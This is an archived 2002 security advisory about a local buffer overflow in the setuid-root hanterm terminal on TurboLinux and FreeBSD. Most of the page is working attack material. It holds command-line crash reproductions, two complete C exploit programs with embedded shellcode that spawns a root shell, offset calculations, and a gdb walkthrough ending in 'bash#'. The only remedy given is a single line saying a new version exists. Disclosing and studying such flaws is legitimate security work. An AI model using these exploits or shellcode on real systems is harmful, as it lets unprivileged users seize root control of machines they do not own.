TUCoPS :: Linux :: Apps A-M :: lnx5077.htm

hanterm local buffer overflow exploit
8th Feb 2002 [SBWID-5077]
COMMAND

	hanterm local buffer overflow exploit

SYSTEMS AFFECTED

	hanterm-xf-p18-3.3-6

PROBLEM

	Xperc posted :
	

	hanterm is Hangul terminal for X. it is based on the xterm  in  XFree86.
	The hanterm binary is default installed  with  setuid  root  permissions
	for TurboLinux Server  6.5.  but  contains  insecure  code  with  allows
	unprivileged local users to obtain root access on the local system.
	

	$which hanterm

	/usr/bin/X11/hanterm

	$ls -l /usr/bin/X11/hanterm

	-rws--x--x	1	root	root 166100  03 13 

	2001 /usr/bin/X11/hanterm*

	$rpm -qf /usr/bin/X11/hanterm

	hanterm-xf-p18-3.3-6

	$hanterm -fn `perl -e \'print \"a\"x100\'`

	Segmentation fault

	$hanterm -hfb `perl -e \'print \"a\"x8000\'`

	Segmentation fault

	$hanterm -hfn `perl -e \'print \"a\"x8000\'`

	Segmentation fault

	...etc

	

	/* hanterm_exp.c

	 *

	 * local exploit for hanterm

	 *  .. tested in TurboLinux Server 6.5 (Japan)              

	 *

	 * thanks my Japanese friend kaju(kaijyu)

	 * and Japanese hacker UNYUN.

	 *

	 *                  by xperc@hotmail.com

	 *                         2002/02/07

	 */

	

	#include <stdio.h>

	

	#define NOP		0x90

	#define MAXBUF		88

	#define RETOFS		84

	#define SHELL_OFS 	22

	#define ESP_OFS 	-0xe38	

	

	unsigned int get_esp()

	{

		__asm__(\"mov %esp,%eax\");

	}

	

	int main()

	{

	        static char shellcode[]={

	            0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,	   

	            0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,

	            0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,	    

	            0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,

	            0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,

	            0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,

	            0x62,0x69,0x6e,0x2f,0x73,0x68,0x00

	        }; 

	        unsigned int retadr;

		char buf[MAXBUF];

	        int i;

		

		memset(buf,NOP,MAXBUF);

	

		retadr=get_esp()+ESP_OFS;

		printf(\"Jumping address = %p\\n\",retadr);

	

		for(i=RETOFS-32;i<RETOFS+32;i+=4){

			buf[i]	=retadr&0xff;

			buf[i+1]=(retadr>>8)&0xff;

			buf[i+2]=(retadr>>16)&0xff;

			buf[i+3]=(retadr>>24)&0xff;

		}

		strncpy(buf+SHELL_OFS,shellcode,strlen(shellcode));

		//buf[MAXBUF-1]=\'\\0\';       faint!:-(

		execl(\"/usr/bin/X11/hanterm\",\"hanterm\",\"-fn\",buf,(char *)0);

	}

	

	

	 Update (11 Feburary 2002)

	 ======

	

	Stuart Moore reported the following exploit for FreeBSD credits goes  to
	\"you dong-hun\" and Xpl017Elz :
	

	

	/*

	**

	** How to exploit?

	**

	** [x82@xpl017elz x82]$ cp /usr/X11R6/bin/hanterm .

	** [x82@xpl017elz x82]$ gdb -q hanterm

	** (no debugging symbols found)...(gdb) r -display 61.xx.177.27:0 -fn`perl -e

	** \'print \"x\"x80\'`

	**

	** Starting program: /home/noname/hanterm -display 61.xx.177.27:0 -fn`perl -e

	** \'print \"x\"x80\'`

	** (no debugging symbols found)...(no debugging symbols found)...

	** (no debugging symbols found)...(no debugging symbols found)...

	** (no debugging symbols found)...(no debugging symbols found)...

	** (no debugging symbols found)...

	** Program received signal SIGSEGV, Segmentation fault.

	** 0x80520e6 in strcpy () at ../sysdeps/generic/strcpy.c:30

	** 30      ../sysdeps/generic/strcpy.c: ±×·± ÆÄÀÏÀ̳ª µð·ºÅ丮°¡ ¾øÀ½.

	** (gdb) info reg $esp

	** esp            0xbfffe6b8       -1073748296

	** (gdb) x/80 0xbffffb00

	** 0xbffffb00:     0x65746e61      0x2d006d72      0x70736964      0x0079616c

	** 0xbffffb10:     0x332e3136      0x37312e37      0x37322e37      0x2d00303a

	** 0xbffffb20:     0x78006e66      0x78787878      0x78787878      0x78787878

	** 0xbffffb30:     0x78787878      0x78787878      0x78787878      0x78787878

	** 0xbffffb40:     0x78787878      0x78787878      0x78787878      0x78787878

	** 0xbffffb50:     0x78787878      0x78787878      0x78787878      0x78787878

	** 0xbffffb60:     0x78787878      0x78787878      0x78787878      0x78787878

	** 0xbffffb70:     0x00787878      0x5353454c      0x4e45504f      0x656c7c3d

	**     ...             ...            ...              ...            ...

	** 0xbffffc10:     0x2d2a2d36      0x3563736b      0x2e313036      0x37383931

	** 0xbffffc20:     0x2d2c302d      0x6f6b2d2a      0x2d676964      0x6964656d

	** 0xbffffc30:     0x722d6d75      0x726f6e2d      0x2d6c616d      0x2d38312d

	** (gdb)

	**

	** Buffer Structure

	**

	** [ data addr: 80byte ] + [ ebp addr: 4byte ] + [ ret addr: 4byte ] = 88byte

	**

	** The return until the address the whole it contains and,

	** it puts in an option.

	**

	** [x82@xpl017elz x82]$ ./exploit

	**

	** XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit

	** Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte

	**

	**                         Exploit made by Xpl017Elz

	**

	** Display HOST_IP: 255.255.255.255:0

	** Jumping Address: 0xbffffb74

	**

	** Segmentation fault

	** [x82@xpl017elz x82]$

	**

	** It calculates the offset.

	** Namely, when 0xbffffb20 from 0xbffffb70 until it catches in between,

	** it will be suitable.

	**

	** [x82@xpl017elz x82]$ ./exploit -a 61.xx.177.27:0 -o 2370 -b 88

	**

	** XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit

	** Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte

	**

	**                         Exploit made by Xpl017Elz

	**

	** Display HOST_IP: 61.xx.177.27:0

	** Jumping Address: 0xbffffb26

	**

	** bash#

	**

	** Ooops! it\'s rootshell :-)

	**

	*/

	

	#include <stdio.h>

	#include <stdlib.h>

	

	#define NOP 0x90

	#define DFOFS 2400

	#define DFIP \"255.255.255.255:0\"

	#define DFBUF 88

	

	/*

	** [ data addr: 80byte ] + [ ebp addr: 4byte ] + [ ret addr: 4byte ] = 88byte

	*/

	

	char shellcode[] = /* 53byte shellcode */

	\"\\x31\\xc0\\xb0\\x46\\x31\\xdb\\x31\\xc9\\xcd\\x80\" /* setreuid(0,0); */

	\"\\xeb\\x1d\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\"

	\"\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\"

	\"\\x08\\x31\\xd2\\xcd\\x80\\xb0\\x01\\x31\\xdb\\xcd\"

	\"\\x80\\xe8\\xde\\xff\\xff\\xff/bin/sh\";

	

	unsigned long sp(void) {

	__asm__(\"movl %esp,%eax\");

	}

	

	main(int argc, char *argv[]) {

	

	int rufp, fpru, jobst,

	     ferbuf, num=DFBUF,

	     ofs=DFOFS;

	

	long addr;

	

	char buffer[2000],

	      hoip[] = DFIP;

	

	extern char *optarg;

	

	banrl();

	

	while ((jobst = getopt(argc, argv, \"a:o:b:\")) !=EOF)

	switch (jobst) {

	case \'a\': strcpy(hoip, optarg);

	break;

	case \'o\': ofs = atoi(optarg);

	break;

	case \'b\': num = atoi(optarg);

	break;

	case \'?\': usages(argv[0]);

	exit(0);

	}

	

	printf(\" Display HOST_IP: %s\\n\",hoip);

	addr = sp() +ofs; // -ofs;

	printf(\" Jumping Address: %p\\n\\n\",addr);

	ferbuf = num - sizeof(shellcode) -4;

	

	bzero(&buffer,2000);

	for(rufp=0; rufp<=ferbuf; rufp++) {

	buffer[rufp] = NOP;

	}

	

	for(fpru=0; fpru<=52; fpru++) {

	buffer[rufp++] = shellcode[fpru];

	}

	buffer[rufp++] =     addr & 0xff;

	buffer[rufp++] = addr>> 8 & 0xff;

	buffer[rufp++] = addr>>16 & 0xff;

	buffer[rufp++] = addr>>24 & 0xff;

	

	execl(\"/usr/X11R6/bin/hanterm\", \"hanterm\",

	\"-display\", hoip, \"-fn\", buffer, NULL);

	

	exit(0);

	

	}

	

	usages(char *var) {

	

	printf(\"\\n Usage:\\n

	  %s -a [host_ip:0] -o [offset] -b [buffer size] (data addr~ return addr)\\n\",var);

	printf(\" Default: %s -a 61.xx.177.27:0 -o 2400 -b 88\\n\\n\",var);

	

	}

	

	banrl() {

	

	printf(\"\\n XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit\\n\");

	printf(\" Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte\\n\\n\");

	printf(\"\\t\\t\\t Exploit made by Xpl017Elz\\n\\n\");

	

	}

	

SOLUTION

	New version has been released.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH